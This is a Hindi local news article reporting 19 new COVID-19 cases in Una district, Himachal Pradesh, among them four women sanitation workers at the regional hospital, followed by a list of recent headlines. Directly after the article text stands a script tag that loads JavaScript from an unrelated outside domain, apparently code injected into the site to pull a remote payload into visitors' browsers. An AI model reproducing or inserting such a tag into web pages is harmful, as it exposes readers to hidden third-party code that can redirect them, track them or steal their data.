Categories: हिमाचल

ऊनाः क्षेत्रीय अस्पताल में 4 महिला सफाई कर्मी सहित 19 निकले कोरोना पॉजिटिव

<p>जिला ऊना से शुक्रवार को कोविड जांच के लिए भेजे गए 241 सैंपल्स में 19 पॉजिटिव जबकि 218 सैंपल निगेटिव और 4 सैंपल रिजेक्ट हुआ है। वहीं 3 संक्रमितों के फॉलोअप सैंपल्स भेजे गए थे जिसमें से 2 पॉजिटिव और 1 सैंपल नेगेटिव है। पहला संक्रमित उपमंडल हरोली के बाथड़ी 45 साल का व्यक्ति यूपी से आया है और घर पर क्वारंटाइन है। दूसरा संक्रमित गगरेट नगर पंचायत के एक नम्बर वार्ड का 37 साल व्यक्ति है। यह संक्रमित के संपर्क में आया था। इसके अलावा क्षेत्रीय अस्पताल में तैनात 42-42 वर्षीय और 48-48 वर्षीय चार महिला सफाई कर्मी पॉजिटिव पाई गई है। क्षेत्रीय अस्पताल में पॉजिटिव मामले आने के बाद इनके सैंपल लिए गए थे।</p>

<p>ऊना उपमंडल के जलग्रां टब्बा की 24 वर्षीय युवती संक्रमित पाई गई है यह संक्रमित के संपर्क में आई थी। शहर के गलुआ का 41 साल का व्यक्ति पॉजिटिव पाया गया है। जिला के उपमंडल के गांव धमान्दरी की 65 वर्षीय महिला संक्रमित हुई है इसमें फ्लू के लक्षण पाए गए थे। गगरेट उपमंडल के ब्रहमपुर में रहने वाला यूपी से लौटा 21 साल का युवक पॉजिटिव पाया गया है। गगरेट के जीतपुर बेहड़ी के 19, 22 और 25 वर्षीय तीन श्रमिक पॉजिटिव पाए गए हैं यह तीनों संक्रमित के संपर्क में आये थे। इसके अलावा गगरेट नगर पंचायत के वार्ड 2 का 57 वर्षीय व्यक्ति पॉजिटिव पाया गया है यह संक्रमित के संपर्क में आया था।</p>

<p>उपमंडल बंगाणा के बडूहा सोहारी का 24 साल का पॉजिटिव पाया गया युवक सोलन के बद्दी&nbsp; से लौटा है। वहीं, उपमंडल अंब के करलूही की 37 साल की महिला और उसकी 27 साल की ननंद भी पॉजिटिव पाई गई है। यह पंजाब के राजपुरा से लौटी है। इसके अलावा कांगड़ा के नैहरन पुखर का 50 साल का व्यक्ति पॉजिटिव पाया गया है जिसका क्षेत्रीय अस्पताल ऊना में सैंपल लिया गया था। क्षेत्रीय अस्पताल ऊना में तैनात एक 28 साल की महिला स्वास्थ्य कर्मी भी संक्रमित हुई है। जिला में संक्रमितों की कुल संख्या 450 हो गई है जिसमें से 130 एक्टिव केस है और 320 रिकवर हो चुके हैं। जिला में माइग्रेटेड इन के 18 मामले आये है जिसमें से 17 रिकवर और 1 केस एक्टिव है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

Himachal: दिवाली बाद 2800 शिक्षकों की भर्ती प्रक्रिया होगी शुरू

2800 JBT TGT Recruitment: हिमाचल प्रदेश में दिवाली के बाद जेबीटी, टीजीटी और सीएंडवी शिक्षकों…

21 mins ago

विश्‍व में सादगी की मिसाल थे रतन टाटा, कभी नहीं रही दुनिया के अरबपतियों की सूची में आने की इच्छा

  एजेंसी/भाषा Ratan Tata Life: रतन टाटा भारत के सबसे प्रभावशाली उद्योगपतियों में से एक…

43 mins ago

नहीं रहे रतन टाटा, 86 वर्ष की आयु में हुआ निधन, देश में शोक

  Ratan Tata death:  भारत के सबसे सम्मानित उद्योगपतियों में से एक और टाटा संस…

1 hour ago

जानें कैसा रहेगा आपका आजका दिन

मेष🐐 (चू, चे, चो, ला, ली, लू, ले, लो, अ) आज का दिन आपके लिए…

1 hour ago

किन्नौर में 300 मीटर खाई में गिरा ट्रक, दो की मौके पर मौत

Kinnaur truck accident: किन्नौर ज़िले के निगुलसरी के पास एक  सड़क दुर्घटना में एक ईंटों…

13 hours ago

मस्जिद की 3 मंजिल गिराने के फैसले को न्यायालय में चुनौती की तैयारी

Sanjauli Mosque Demolition Controversy: राजधानी शिमला के संजौली क्षेत्र में स्थित मस्जिद की तीन अवैध…

13 hours ago